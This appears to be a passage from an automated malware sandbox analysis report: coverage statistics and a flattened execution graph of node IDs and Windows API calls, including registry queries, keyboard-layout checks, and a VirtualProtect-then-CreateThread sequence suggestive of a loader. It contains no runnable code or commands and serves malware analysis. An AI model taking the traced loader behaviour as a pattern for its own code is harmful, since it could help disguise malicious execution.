      • Instruction Fuzzy Hash: 1DF082B6200204AFC7209FA8ED8CDAB77ADEFC437131A5866F506D7111DA70F846CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Execution Graph

      Execution Coverage:3.2%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:1.3%
      Total number of Nodes:1126
      Total number of Limit Nodes:28
      execution_graph 46647 423730 46650 463830 46647->46650 46648 423746 46651 463898 46650->46651 46657 463866 46650->46657 46738 4636e4 46651->46738 46653 4638a3 46655 4638b3 46653->46655 46656 463961 46653->46656 46660 463dfc 46655->46660 46661 4638b9 46655->46661 46658 4639b7 46656->46658 46659 463968 46656->46659 46657->46651 46734 463887 46657->46734 46746 419c84 56 API calls 46657->46746 46665 463945 46658->46665 46671 463e16 46658->46671 46672 4639c4 46658->46672 46663 46396e 46659->46663 46691 463cd4 46659->46691 46764 464a04 12 API calls 46660->46764 46664 4638c4 46661->46664 46668 463bc4 46661->46668 46666 463975 46663->46666 46667 46399e 46663->46667 46664->46665 46669 46392d 46664->46669 46670 46394a 46664->46670 46665->46734 46745 4637a8 NtdllDefWindowProc_A 46665->46745 46688 463982 46666->46688 46689 4639f9 46666->46689 46666->46734 46667->46665 46693 463cb2 46667->46693 46667->46734 46680 463bd1 46668->46680 46668->46734 46675 463933 46669->46675 46697 463ea0 46669->46697 46676 463953 46670->46676 46677 463a8f 46670->46677 46678 463e37 46671->46678 46679 463e1f 46671->46679 46673 4639cf 46672->46673 46674 463dbd IsIconic 46672->46674 46673->46660 46673->46665 46682 463dd1 GetFocus 46674->46682 46674->46734 46683 46393c 46675->46683 46684 463e7a 46675->46684 46676->46665 46685 463bdb 46676->46685 46750 463f30 46677->46750 46766 464510 57 API calls 46678->46766 46765 4644b4 26 API calls 46679->46765 46758 4048c4 7 API calls 46680->46758 46698 463de2 46682->46698 46682->46734 46683->46665 46699 463ac3 46683->46699 46767 44fb64 46684->46767 46710 463c09 46685->46710 46685->46734 46688->46665 46701 463b98 SendMessageA 46688->46701 46695 463a14 46689->46695 46696 463a0b 46689->46696 46714 463cfa IsWindowEnabled 46691->46714 46691->46734 46760 464374 IsWindowEnabled 46693->46760 46747 463f4c 70 API calls 46695->46747 46703 463a12 46696->46703 46704 463a21 46696->46704 46782 4637a8 NtdllDefWindowProc_A 46697->46782 46763 45b4f4 GetCurrentThreadId 73BEAC10 46698->46763 46755 4637a8 NtdllDefWindowProc_A 46699->46755 46701->46734 46702 463e8c 46780 46373c 11 API calls 46702->46780 46749 4637a8 NtdllDefWindowProc_A 46703->46749 46748 463ffc 67 API calls 46704->46748 46759 40e8bc SetErrorMode LoadLibraryA 46710->46759 46712 463de9 46718 463df1 SetFocus 46712->46718 46712->46734 46713 463ac9 46719 463ae6 46713->46719 46720 463b08 46713->46720 46721 463d08 46714->46721 46714->46734 46715 463e97 46781 4637a8 NtdllDefWindowProc_A 46715->46781 46718->46734 46756 463648 57 API calls 46719->46756 46757 463638 62 API calls 46720->46757 46730 463d0f IsWindowVisible 46721->46730 46723 463c18 46726 463c27 GetProcAddress 46723->46726 46727 463c69 GetLastError 46723->46727 46731 463bd6 46726->46731 46726->46734 46727->46734 46728 463aee PostMessageA 46728->46734 46729 463b10 PostMessageA 46729->46734 46732 463d1d GetFocus 46730->46732 46730->46734 46731->46734 46761 44b158 46732->46761 46734->46648 46735 463d32 SetFocus 46762 445ae8 46735->46762 46737 463d51 SetFocus 46737->46734 46739 4636f7 46738->46739 46740 463702 SetThreadLocale 46739->46740 46741 463711 46739->46741 46744 463721 46739->46744 46783 40dd64 74 API calls 46740->46783 46741->46744 46784 46268c 46741->46784 46744->46653 46745->46734 46746->46657 46747->46734 46748->46734 46749->46734 46810 42c2ec 46750->46810 46753 463f3f LoadIconA 46754 463f4b 46753->46754 46754->46734 46755->46713 46756->46728 46757->46729 46759->46723 46760->46734 46761->46735 46762->46737 46763->46712 46764->46731 46765->46731 46766->46731 46768 44fb73 46767->46768 46769 44fb6c 46767->46769 46825 44fac8 46768->46825 46772 44fb9e SystemParametersInfoA 46769->46772 46773 44fbaf SendMessageA 46769->46773 46778 44fb71 46769->46778 46772->46778 46773->46778 46774 44fb80 46828 44fb14 6 API calls 46774->46828 46775 44fb89 46829 44fae4 SystemParametersInfoA 46775->46829 46778->46702 46779 44fb90 46779->46702 46780->46715 46781->46734 46782->46734 46783->46741 46786 4626a5 46784->46786 46785 4626d6 SystemParametersInfoA 46787 462701 GetStockObject 46785->46787 46788 4626e9 CreateFontIndirectA 46785->46788 46786->46785 46790 425ce8 30 API calls 46787->46790 46802 425ce8 46788->46802 46792 462715 SystemParametersInfoA 46790->46792 46793 462735 CreateFontIndirectA 46792->46793 46794 462769 46792->46794 46796 425ce8 30 API calls 46793->46796 46807 425dcc 30 API calls 46794->46807 46798 46274e CreateFontIndirectA 46796->46798 46797 462779 GetStockObject 46799 425ce8 30 API calls 46797->46799 46800 425ce8 30 API calls 46798->46800 46801 462767 46799->46801 46800->46801 46801->46744 46808 4258a4 GetObjectA 46802->46808 46804 425cfa 46809 425adc 29 API calls 46804->46809 46806 425d03 46806->46792 46807->46797 46808->46804 46809->46806 46813 42c328 46810->46813 46814 42c2f6 46813->46814 46815 42c338 46813->46815 46814->46753 46814->46754 46815->46814 46822 41c3d0 56 API calls 46815->46822 46817 42c357 46817->46814 46818 42c371 46817->46818 46819 42c364 46817->46819 46823 42794c 62 API calls 46818->46823 46824 426de4 56 API calls 46819->46824 46822->46817 46823->46814 46824->46814 46830 42d620 46825->46830 46828->46778 46829->46779 46831 42d650 46830->46831 46832 42d630 46830->46832 46835 42d687 46831->46835 46836 42d681 GetSystemMetrics 46831->46836 46837 42d52c 46832->46837 46835->46774 46835->46775 46836->46835 46838 42d543 46837->46838 46840 42d5a1 46838->46840 46842 42d5ba 46838->46842 46843 42d52c 11 API calls 46838->46843 46844 42d5a9 GetProcAddress 46840->46844 46848 404a40 46842->46848 46845 42d58b 46843->46845 46844->46842 46845->46840 46846 42d599 46845->46846 46847 404a40 11 API calls 46846->46847 46847->46840 46849 404a61 KiUserCallbackDispatcher 46848->46849 46850 404a46 46848->46850 46849->46835 46850->46849 46852 402afc 11 API calls 46850->46852 46852->46849 46853 44ce20 46854 44ce2a 46853->46854 46861 446e50 46854->46861 46858 44ce4c 46881 443504 81 API calls 46858->46881 46860 44ce5d 46862 446e61 46861->46862 46882 443a28 58 API calls 46862->46882 46864 446e85 46883 423758 46864->46883 46866 446e90 46886 426150 27 API calls 46866->46886 46868 446ea2 46887 4262f8 29 API calls 46868->46887 46870 446eb4 46871 446ee4 46870->46871 46872 446ed7 46870->46872 46888 4624f0 46871->46888 46873 404a40 11 API calls 46872->46873 46876 446ee2 46873->46876 46878 404a40 11 API calls 46876->46878 46879 446f47 46878->46879 46880 426448 61 API calls 46879->46880 46880->46858 46881->46860 46882->46864 46884 423771 VirtualAlloc 46883->46884 46885 4237a7 46883->46885 46884->46885 46885->46866 46886->46868 46887->46870 46899 4622cc 46888->46899 46890 4624fd 46891 404a94 25 API calls 46890->46891 46892 446ef3 46891->46892 46893 404a94 46892->46893 46894 404a98 46893->46894 46897 404aa8 46893->46897 46894->46897 46918 404b04 25 API calls 46894->46918 46895 404ad6 46895->46876 46897->46895 46919 402afc 11 API calls 46897->46919 46900 4622fc 46899->46900 46901 46246c 46899->46901 46904 404a40 11 API calls 46900->46904 46902 404a40 11 API calls 46901->46902 46903 46249b 46902->46903 46903->46890 46905 462319 GetKeyboardLayoutList GetSystemDefaultLangID 46904->46905 46905->46901 46906 46233d 46905->46906 46906->46901 46907 462369 46906->46907 46913 40a0cc 46907->46913 46910 462441 RegCloseKey 46910->46890 46911 4623ca RegQueryValueExA 46911->46910 46912 4623f2 46911->46912 46912->46910 46914 40a0fc RegOpenKeyExA 46913->46914 46915 40a0dd 46913->46915 46914->46910 46914->46911 46915->46914 46917 409d54 56 API calls 46915->46917 46917->46914 46918->46897 46919->46895 46920 6ed91b50 GetModuleHandleA GetModuleFileNameA lstrcpyA 46921 6ed91bab lstrcatA 46920->46921 46922 6ed91b9e 46920->46922 46948 6ed93df0 46921->46948 46922->46921 46924 6ed91bcc 46925 6ed91be7 46924->46925 46926 6ed96a1f 10 API calls 46924->46926 46953 6ed93a00 46925->46953 46926->46925 46928 6ed91bf3 46957 6ed94ed0 46928->46957 46931 6ed91c51 46961 6ed96310 46931->46961 46932 6ed91c94 46968 6ed94de0 46932->46968 46934 6ed91ce7 46974 6ed938b0 46934->46974 46936 6ed91d43 46937 6ed94ed0 27 API calls 46936->46937 46940 6ed91d4c 46937->46940 46938 6ed91d7b VirtualProtect 46939 6ed91dba 46938->46939 46978 6ed91000 46939->46978 46940->46938 46942 6ed91e0c 46943 6ed91e2a CreateThread CloseHandle Sleep 46942->46943 46944 6ed91e10 lstrcpynA 46942->46944 46991 6ed96a1f 46943->46991 46945 6ed91250 46944->46945 46945->46943 46994 6ed91a60 46948->46994 46950 6ed93e55 46951 6ed94de0 97 API calls 46950->46951 46952 6ed93eb5 46951->46952 46952->46924 46954 6ed93a12 46953->46954 46955 6ed93a29 46953->46955 47017 6ed94600 46954->47017 46955->46928 46958 6ed94edd 46957->46958 46959 6ed94ee1 46957->46959 46958->46931 47159 6ed972f8 46959->47159 46962 6ed96290 46961->46962 46964 6ed962b4 46962->46964 46965 6ed962c9 std::exception::exception 46962->46965 46966 6ed962f5 std::exception::exception __CxxThrowException 46962->46966 47224 6ed989a7 46962->47224 46964->46932 47237 6ed96785 8 API calls __cinit 46965->47237 46966->46961 46969 6ed94e12 46968->46969 46973 6ed94e76 46968->46973 47249 6eda2910 46969->47249 46971 6ed94e22 46972 6ed94e65 std::_Lockit::_Lockit 46971->46972 46971->46973 46972->46973 46973->46934 46975 6ed938ff 46974->46975 46976 6ed93939 46975->46976 47542 6ed93ba0 46975->47542 46976->46936 46979 6ed9100d _memset 46978->46979 46980 6ed9107c 7 API calls 46979->46980 46981 6ed95c98 46980->46981 46982 6ed91103 lstrcpyA CoInitialize CoCreateInstance 46981->46982 46985 6ed91146 46982->46985 46987 6ed911a1 CoUninitialize 46982->46987 46984 6ed911c3 46984->46942 46986 6ed911d6 MultiByteToWideChar 46985->46986 46985->46987 46988 6ed9120a 46986->46988 46987->46984 46988->46984 46989 6ed9122a CoUninitialize 46988->46989 46990 6ed91242 46989->46990 46990->46942 47636 6ed968df 46991->47636 46993 6ed91e58 46995 6ed91a9a 46994->46995 46996 6ed91adb 46995->46996 47001 6eda21d7 46995->47001 46996->46950 46998 6ed91aa8 46999 6ed91aaf std::_Lockit::_Lockit 46998->46999 47000 6ed91ac6 46999->47000 47000->46950 47002 6eda21e3 __EH_prolog3 47001->47002 47003 6eda21f0 std::_Lockit::_Lockit 47002->47003 47009 6eda2248 std::locale::_Init 47002->47009 47004 6eda2207 47003->47004 47003->47009 47005 6eda221d 47004->47005 47006 6eda2213 std::locale::_Locimp::_Locimp 47004->47006 47010 6eda1f9c 47005->47010 47006->47005 47009->46998 47011 6eda1faa 47010->47011 47013 6eda1fbb _Yarn 47010->47013 47014 6eda2a38 47011->47014 47013->47009 47015 6eda2a4c RtlEncodePointer 47014->47015 47016 6eda2a46 47014->47016 47015->47013 47016->47015 47018 6ed94618 47017->47018 47019 6ed9466a 47018->47019 47022 6ed9467f 47018->47022 47023 6ed96e9a 47018->47023 47019->47022 47036 6ed96f19 47019->47036 47022->46955 47026 6ed96ea6 47023->47026 47024 6ed96eb2 47066 6ed987f9 11 API calls __getptd_noexit 47024->47066 47025 6ed96ed8 47050 6ed96b4f 47025->47050 47026->47024 47026->47025 47028 6ed96eb7 47067 6ed987a7 6 API calls __lseeki64 47028->47067 47035 6ed96ec2 47035->47019 47037 6ed96f39 47036->47037 47038 6ed96f24 47036->47038 47040 6ed96f41 47037->47040 47041 6ed96f56 47037->47041 47153 6ed987f9 11 API calls __getptd_noexit 47038->47153 47155 6ed987f9 11 API calls __getptd_noexit 47040->47155 47142 6ed9b010 47041->47142 47042 6ed96f29 47154 6ed987a7 6 API calls __lseeki64 47042->47154 47046 6ed96f46 47156 6ed987a7 6 API calls __lseeki64 47046->47156 47047 6ed96f51 47047->47022 47048 6ed96f34 47048->47022 47051 6ed96b61 47050->47051 47052 6ed96b83 EnterCriticalSection 47050->47052 47051->47052 47053 6ed96b69 __lock 47051->47053 47054 6ed96b8d 47052->47054 47053->47054 47055 6ed96dfe 47054->47055 47056 6ed96e88 47055->47056 47057 6ed96e0f 47055->47057 47114 6ed987f9 11 API calls __getptd_noexit 47056->47114 47057->47056 47058 6ed96e20 47057->47058 47060 6ed96e3a __flush 47058->47060 47094 6ed9acc6 47058->47094 47064 6ed96e48 47060->47064 47061 6ed96e7a 47068 6ed96f0f LeaveCriticalSection _fgetc 47061->47068 47063 6ed96e31 47063->47060 47069 6ed9abdc 47064->47069 47066->47028 47067->47035 47068->47035 47070 6ed9abe8 47069->47070 47071 6ed9abf9 47070->47071 47072 6ed9ac15 47070->47072 47131 6ed9880c 11 API calls __getptd_noexit 47071->47131 47073 6ed9ac21 47072->47073 47078 6ed9ac5b 47072->47078 47133 6ed9880c 11 API calls __getptd_noexit 47073->47133 47076 6ed9abfe 47132 6ed987f9 11 API calls __getptd_noexit 47076->47132 47077 6ed9ac26 47134 6ed987f9 11 API calls __getptd_noexit 47077->47134 47115 6ed9e23b 47078->47115 47082 6ed9ac2e 47135 6ed987a7 6 API calls __lseeki64 47082->47135 47083 6ed9ac61 47085 6ed9ac8b 47083->47085 47086 6ed9ac6f 47083->47086 47136 6ed987f9 11 API calls __getptd_noexit 47085->47136 47122 6ed9ab57 47086->47122 47089 6ed9ac06 47089->47061 47090 6ed9ac80 47138 6ed9acbc LeaveCriticalSection __unlock_fhandle 47090->47138 47091 6ed9ac90 47137 6ed9880c 11 API calls __getptd_noexit 47091->47137 47095 6ed9acd5 47094->47095 47096 6ed9abdc __lseeki64 23 API calls 47095->47096 47097 6ed9ad08 47096->47097 47098 6ed9aeea 47097->47098 47099 6ed9ad8f 47097->47099 47112 6ed9ad23 47097->47112 47100 6ed9aeee 47098->47100 47105 6ed9aeb6 47098->47105 47101 6ed9ada7 47099->47101 47099->47105 47141 6ed987f9 11 API calls __getptd_noexit 47100->47141 47103 6ed9abdc __lseeki64 23 API calls 47101->47103 47101->47112 47104 6ed9add7 47103->47104 47107 6ed9adfa ReadFile 47104->47107 47104->47112 47106 6ed9abdc __lseeki64 23 API calls 47105->47106 47105->47112 47108 6ed9af3b 47106->47108 47109 6ed9ae20 47107->47109 47107->47112 47110 6ed9abdc __lseeki64 23 API calls 47108->47110 47108->47112 47111 6ed9abdc __lseeki64 23 API calls 47109->47111 47110->47112 47113 6ed9ae39 47111->47113 47112->47063 47113->47112 47114->47061 47116 6ed9e247 47115->47116 47117 6ed9e26c __lock 47116->47117 47120 6ed9e28f ___lock_fhandle 47116->47120 47118 6ed9e27c InitializeCriticalSectionAndSpinCount 47117->47118 47117->47120 47118->47120 47119 6ed9e2a6 EnterCriticalSection 47121 6ed9e2c3 47119->47121 47120->47119 47120->47121 47121->47083 47123 6ed9ab75 47122->47123 47124 6ed9ab7d 47123->47124 47125 6ed9ab8e SetFilePointer 47123->47125 47139 6ed987f9 11 API calls __getptd_noexit 47124->47139 47127 6ed9aba6 GetLastError 47125->47127 47128 6ed9ab82 47125->47128 47127->47128 47129 6ed9abb0 47127->47129 47128->47090 47140 6ed9881f 11 API calls 2 library calls 47129->47140 47131->47076 47132->47089 47133->47077 47134->47082 47135->47089 47136->47091 47137->47090 47138->47089 47139->47128 47140->47128 47141->47112 47143 6ed9b01c 47142->47143 47144 6ed9b028 47143->47144 47145 6ed9b03f 47143->47145 47157 6ed987f9 11 API calls __getptd_noexit 47144->47157 47147 6ed96b4f __lock_file 2 API calls 47145->47147 47148 6ed9b047 47147->47148 47150 6ed9acc6 __ftelli64_nolock 24 API calls 47148->47150 47149 6ed9b02d 47158 6ed987a7 6 API calls __lseeki64 47149->47158 47152 6ed9b038 47150->47152 47152->47047 47153->47042 47154->47048 47155->47046 47156->47047 47157->47149 47158->47152 47160 6ed97304 47159->47160 47161 6ed9732b 47160->47161 47162 6ed97316 47160->47162 47164 6ed96b4f __lock_file 2 API calls 47161->47164 47169 6ed97326 47161->47169 47182 6ed987f9 11 API calls __getptd_noexit 47162->47182 47166 6ed97344 47164->47166 47165 6ed9731b 47183 6ed987a7 6 API calls __lseeki64 47165->47183 47170 6ed9728b 47166->47170 47169->46958 47171 6ed9729c 47170->47171 47172 6ed972b0 47170->47172 47205 6ed987f9 11 API calls __getptd_noexit 47171->47205 47174 6ed972ac 47172->47174 47175 6ed972b6 __flush __freebuf 47172->47175 47174->47169 47177 6ed972ca 47175->47177 47176 6ed972a1 47206 6ed987a7 6 API calls __lseeki64 47176->47206 47184 6ed9b223 47177->47184 47180 6ed972d0 47180->47174 47207 6ed96256 11 API calls 2 library calls 47180->47207 47182->47165 47183->47169 47185 6ed9b22f 47184->47185 47186 6ed9b237 47185->47186 47189 6ed9b252 47185->47189 47217 6ed9880c 11 API calls __getptd_noexit 47186->47217 47188 6ed9b25e 47219 6ed9880c 11 API calls __getptd_noexit 47188->47219 47189->47188 47192 6ed9b298 47189->47192 47190 6ed9b23c 47218 6ed987f9 11 API calls __getptd_noexit 47190->47218 47195 6ed9e23b ___lock_fhandle 3 API calls 47192->47195 47194 6ed9b263 47220 6ed987f9 11 API calls __getptd_noexit 47194->47220 47197 6ed9b29e 47195->47197 47199 6ed9b2b8 47197->47199 47200 6ed9b2ac 47197->47200 47198 6ed9b26b 47221 6ed987a7 6 API calls __lseeki64 47198->47221 47222 6ed987f9 11 API calls __getptd_noexit 47199->47222 47208 6ed9b187 47200->47208 47204 6ed9b244 47204->47180 47205->47176 47206->47174 47207->47174 47209 6ed9b197 47208->47209 47210 6ed9b1ed 47209->47210 47215 6ed9b1d7 FindCloseChangeNotification 47209->47215 47211 6ed9b1ef __free_osfhnd 47210->47211 47212 6ed9b211 47211->47212 47214 6ed9b217 47211->47214 47223 6ed9881f 11 API calls 2 library calls 47212->47223 47214->47204 47215->47210 47216 6ed9b1e3 GetLastError 47215->47216 47216->47211 47217->47190 47218->47204 47219->47194 47220->47198 47221->47204 47222->47204 47223->47214 47225 6ed98a24 47224->47225 47232 6ed989b5 47224->47232 47244 6ed987f9 11 API calls __getptd_noexit 47225->47244 47228 6ed989e3 RtlAllocateHeap 47228->47232 47236 6ed98a1c 47228->47236 47229 6ed989c5 __NMSG_WRITE 47239 6ed967c7 47229->47239 47231 6ed98a10 47242 6ed987f9 11 API calls __getptd_noexit 47231->47242 47232->47228 47232->47231 47234 6ed98a0e 47232->47234 47238 6ed9a2b1 __NMSG_WRITE __NMSG_WRITE 47232->47238 47243 6ed987f9 11 API calls __getptd_noexit 47234->47243 47236->46962 47237->46962 47238->47229 47245 6ed9679c GetModuleHandleW 47239->47245 47242->47234 47243->47236 47244->47236 47246 6ed967b0 GetProcAddress 47245->47246 47247 6ed967c5 ExitProcess 47245->47247 47246->47247 47248 6ed967c0 47246->47248 47248->47247 47250 6eda2868 47249->47250 47252 6eda2849 std::_Xfsopen 91 API calls 47250->47252 47254 6eda28cd 47250->47254 47258 6eda28b3 47250->47258 47252->47254 47256 6eda28d4 47254->47256 47259 6eda2849 47254->47259 47255 6eda28f6 _fseek 47255->47256 47255->47258 47257 6ed972f8 __fcloseall 27 API calls 47256->47257 47257->47258 47258->46971 47262 6eda308d 47259->47262 47261 6eda2863 47261->47255 47261->47258 47265 6eda3099 47262->47265 47263 6eda30ac 47312 6ed987f9 11 API calls __getptd_noexit 47263->47312 47265->47263 47267 6eda30d9 47265->47267 47266 6eda30b1 47313 6ed987a7 6 API calls __lseeki64 47266->47313 47279 6eda421f 47267->47279 47270 6eda30de 47271 6eda30f2 47270->47271 47272 6eda30e5 47270->47272 47274 6eda3119 47271->47274 47275 6eda30f9 47271->47275 47314 6ed987f9 11 API calls __getptd_noexit 47272->47314 47292 6eda3f88 47274->47292 47315 6ed987f9 11 API calls __getptd_noexit 47275->47315 47278 6eda30bc @_EH4_CallFilterFunc@8 47278->47261 47280 6ed99460 47279->47280 47281 6eda422b __lock 47280->47281 47290 6eda423f 47281->47290 47282 6eda42b5 __malloc_crt 47283 6eda42ca InitializeCriticalSectionAndSpinCount 47282->47283 47284 6eda42ae 47282->47284 47285 6eda42ea 47283->47285 47286 6eda42fd EnterCriticalSection 47283->47286 47284->47270 47318 6ed96256 11 API calls 2 library calls 47285->47318 47286->47284 47287 6eda4272 __mtinitlocknum 47287->47284 47287->47290 47290->47282 47290->47284 47290->47287 47316 6ed96b90 __lock EnterCriticalSection 47290->47316 47317 6ed96bfe LeaveCriticalSection 47290->47317 47293 6eda3faa 47292->47293 47294 6eda3fbe 47293->47294 47303 6eda3fd5 47293->47303 47322 6ed987f9 11 API calls __getptd_noexit 47294->47322 47296 6eda3fc3 47323 6ed987a7 6 API calls __lseeki64 47296->47323 47297 6eda41d8 47319 6eda4e39 47297->47319 47298 6eda41c6 47324 6ed987f9 11 API calls __getptd_noexit 47298->47324 47302 6eda3fce 47302->47278 47303->47298 47305 6eda4134 __fassign 47303->47305 47310 6eda4172 47303->47310 47304 6eda41cb 47325 6ed987a7 6 API calls __lseeki64 47304->47325 47305->47298 47307 6eda4148 47305->47307 47307->47298 47307->47307 47308 6eda415e __fassign 47307->47308 47309 6eda417d __fassign 47308->47309 47308->47310 47309->47310 47311 6eda419c __fassign 47309->47311 47310->47297 47310->47298 47311->47298 47311->47310 47312->47266 47313->47278 47314->47278 47315->47278 47316->47290 47317->47290 47318->47284 47326 6eda4d75 47319->47326 47321 6eda4e54 47321->47302 47322->47296 47323->47302 47324->47304 47325->47302 47329 6eda4d81 47326->47329 47327 6eda4d94 47430 6ed987f9 11 API calls __getptd_noexit 47327->47430 47329->47327 47331 6eda4dca 47329->47331 47330 6eda4d99 47431 6ed987a7 6 API calls __lseeki64 47330->47431 47337 6eda4641 47331->47337 47334 6eda4de4 47432 6eda4e0b LeaveCriticalSection __unlock_fhandle 47334->47432 47335 6eda4da3 47335->47321 47344 6eda4668 47337->47344 47339 6eda46c3 47436 6ed9880c 11 API calls __getptd_noexit 47339->47436 47340 6eda4d74 47342 6eda4d94 47340->47342 47349 6eda4dca 47340->47349 47518 6ed987f9 11 API calls __getptd_noexit 47342->47518 47343 6eda46c8 47437 6ed987f9 11 API calls __getptd_noexit 47343->47437 47344->47339 47350 6eda471e 47344->47350 47389 6eda48f3 47344->47389 47347 6eda4d99 47519 6ed987a7 6 API calls __lseeki64 47347->47519 47348 6eda46d2 47438 6ed987a7 6 API calls __lseeki64 47348->47438 47354 6eda4641 __tsopen_nolock 62 API calls 47349->47354 47351 6eda47a5 47350->47351 47363 6eda4778 __alloc_osfhnd 47350->47363 47439 6ed9880c 11 API calls __getptd_noexit 47351->47439 47356 6eda4de4 47354->47356 47520 6eda4e0b LeaveCriticalSection __unlock_fhandle 47356->47520 47357 6eda47aa 47440 6ed987f9 11 API calls __getptd_noexit 47357->47440 47360 6eda4da3 47360->47334 47362 6eda47b4 47441 6ed987a7 6 API calls __lseeki64 47362->47441 47365 6eda483f 47363->47365 47366 6eda4860 CreateFileA 47363->47366 47442 6ed9880c 11 API calls __getptd_noexit 47365->47442 47367 6eda48fd GetFileType 47366->47367 47368 6eda488d 47366->47368 47372 6eda490a GetLastError 47367->47372 47373 6eda494e __set_osfhnd 47367->47373 47371 6eda48c6 GetLastError 47368->47371 47375 6eda48a1 CreateFileA 47368->47375 47369 6eda46dc 47369->47334 47445 6ed9881f 11 API calls 2 library calls 47371->47445 47447 6ed9881f 11 API calls 2 library calls 47372->47447 47382 6eda49b3 47373->47382 47399 6eda49da 47373->47399 47374 6eda4844 47443 6ed987f9 11 API calls __getptd_noexit 47374->47443 47375->47367 47375->47371 47380 6eda4933 CloseHandle 47383 6eda4941 47380->47383 47407 6eda48ed 47380->47407 47381 6eda484e 47444 6ed987f9 11 API calls __getptd_noexit 47381->47444 47388 6eda49c2 __lseek_nolock 47382->47388 47390 6eda4b82 47382->47390 47382->47399 47448 6ed987f9 11 API calls __getptd_noexit 47383->47448 47387 6eda4946 47387->47407 47391 6eda49ee 47388->47391 47392 6eda49d5 47388->47392 47433 6ed98755 47389->47433 47390->47389 47395 6eda4cea CloseHandle CreateFileA 47390->47395 47450 6ed9d11c 47391->47450 47449 6ed9880c 11 API calls __getptd_noexit 47392->47449 47396 6eda4d4b 47395->47396 47397 6eda4d17 GetLastError 47395->47397 47396->47389 47517 6ed9881f 11 API calls 2 library calls 47397->47517 47399->47390 47402 6eda49e2 47399->47402 47409 6eda4b8b 47399->47409 47410 6eda4adb 47399->47410 47401 6eda4a1f __lseek_nolock 47401->47399 47401->47402 47405 6ed9b187 __close_nolock 14 API calls 47402->47405 47403 6eda4d23 __free_osfhnd 47403->47396 47404 6eda4a0c __chsize_nolock 47404->47401 47404->47402 47405->47407 47406 6eda4b46 47406->47402 47408 6ed9d11c __read_nolock 28 API calls 47406->47408 47446 6ed987f9 11 API calls __getptd_noexit 47407->47446 47419 6eda4b60 47408->47419 47409->47390 47411 6ed9ab57 __lseeki64_nolock 13 API calls 47409->47411 47413 6eda4aff 47409->47413 47410->47390 47410->47406 47410->47413 47414 6ed9ab57 __lseeki64_nolock 13 API calls 47410->47414 47412 6eda4bb3 47411->47412 47412->47413 47415 6eda4bbe 47412->47415 47413->47390 47413->47402 47516 6ed9aa83 50 API calls 4 library calls 47413->47516 47422 6eda4b35 47414->47422 47424 6ed9ab57 __lseeki64_nolock 13 API calls 47415->47424 47417 6eda4be9 47425 6ed9b187 __close_nolock 14 API calls 47417->47425 47418 6eda4c03 47420 6eda4c25 __lseek_nolock 47418->47420 47421 6eda4c0a __lseek_nolock 47418->47421 47419->47390 47419->47402 47419->47417 47419->47418 47419->47420 47423 6eda4bc8 47420->47423 47421->47390 47421->47402 47422->47413 47426 6eda4b3c 47422->47426 47423->47390 47423->47402 47424->47423 47427 6eda4bf0 47425->47427 47428 6ed9ab57 __lseeki64_nolock 13 API calls 47426->47428 47515 6ed987f9 11 API calls __getptd_noexit 47427->47515 47428->47406 47430->47330 47431->47335 47432->47335 47521 6ed9862c 47433->47521 47435 6ed98767 GetCurrentProcess TerminateProcess 47435->47340 47436->47343 47437->47348 47438->47369 47439->47357 47440->47362 47441->47369 47442->47374 47443->47381 47444->47369 47445->47407 47446->47389 47447->47380 47448->47387 47449->47399 47451 6ed9d138 47450->47451 47452 6ed9d153 47450->47452 47525 6ed9880c 11 API calls __getptd_noexit 47451->47525 47454 6ed9d162 47452->47454 47457 6ed9d181 47452->47457 47527 6ed9880c 11 API calls __getptd_noexit 47454->47527 47456 6ed9d13d 47526 6ed987f9 11 API calls __getptd_noexit 47456->47526 47459 6ed9d19f 47457->47459 47471 6ed9d1b3 47457->47471 47458 6ed9d167 47528 6ed987f9 11 API calls __getptd_noexit 47458->47528 47530 6ed9880c 11 API calls __getptd_noexit 47459->47530 47463 6ed9d145 47463->47401 47463->47404 47464 6ed9d209 47532 6ed9880c 11 API calls __getptd_noexit 47464->47532 47465 6ed9d16e 47529 6ed987a7 6 API calls __lseeki64 47465->47529 47467 6ed9d1a4 47531 6ed987f9 11 API calls __getptd_noexit 47467->47531 47469 6ed9d20e 47533 6ed987f9 11 API calls __getptd_noexit 47469->47533 47471->47463 47471->47464 47474 6ed9d1e8 47471->47474 47475 6ed9d222 __malloc_crt 47471->47475 47473 6ed9d1ab 47534 6ed987a7 6 API calls __lseeki64 47473->47534 47474->47464 47477 6ed9d1f3 ReadFile 47474->47477 47479 6ed9d260 47475->47479 47480 6ed9d242 47475->47480 47483 6ed9d31e 47477->47483 47484 6ed9d696 GetLastError 47477->47484 47485 6ed9ab57 __lseeki64_nolock 13 API calls 47479->47485 47535 6ed987f9 11 API calls __getptd_noexit 47480->47535 47483->47484 47491 6ed9d332 47483->47491 47487 6ed9d51d 47484->47487 47488 6ed9d6a3 47484->47488 47485->47477 47486 6ed9d247 47536 6ed9880c 11 API calls __getptd_noexit 47486->47536 47496 6ed9d4a2 47487->47496 47538 6ed9881f 11 API calls 2 library calls 47487->47538 47540 6ed987f9 11 API calls __getptd_noexit 47488->47540 47491->47496 47497 6ed9d34e 47491->47497 47499 6ed9d562 47491->47499 47492 6ed9d6a8 47541 6ed9880c 11 API calls __getptd_noexit 47492->47541 47496->47463 47539 6ed96256 11 API calls 2 library calls 47496->47539 47498 6ed9d3b2 ReadFile 47497->47498 47507 6ed9d42f 47497->47507 47501 6ed9d3d0 GetLastError 47498->47501 47510 6ed9d3da 47498->47510 47499->47496 47500 6ed9d5d7 ReadFile 47499->47500 47502 6ed9d5f6 GetLastError 47500->47502 47508 6ed9d600 47500->47508 47501->47497 47501->47510 47502->47499 47502->47508 47504 6ed9d517 GetLastError 47504->47487 47505 6ed9d4aa 47512 6ed9d467 MultiByteToWideChar 47505->47512 47514 6ed9ab57 __lseeki64_nolock 13 API calls 47505->47514 47506 6ed9d49d 47537 6ed987f9 11 API calls __getptd_noexit 47506->47537 47507->47496 47507->47505 47507->47506 47507->47512 47508->47499 47511 6ed9ab57 __lseeki64_nolock 13 API calls 47508->47511 47510->47497 47513 6ed9ab57 __lseeki64_nolock 13 API calls 47510->47513 47511->47508 47512->47496 47512->47504 47513->47510 47514->47512 47515->47389 47516->47413 47517->47403 47518->47347 47519->47360 47520->47360 47522 6ed9864b _memset 47521->47522 47523 6ed98669 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 47522->47523 47524 6ed98737 47523->47524 47524->47435 47525->47456 47526->47463 47527->47458 47528->47465 47529->47463 47530->47467 47531->47473 47532->47469 47533->47473 47534->47463 47535->47486 47536->47463 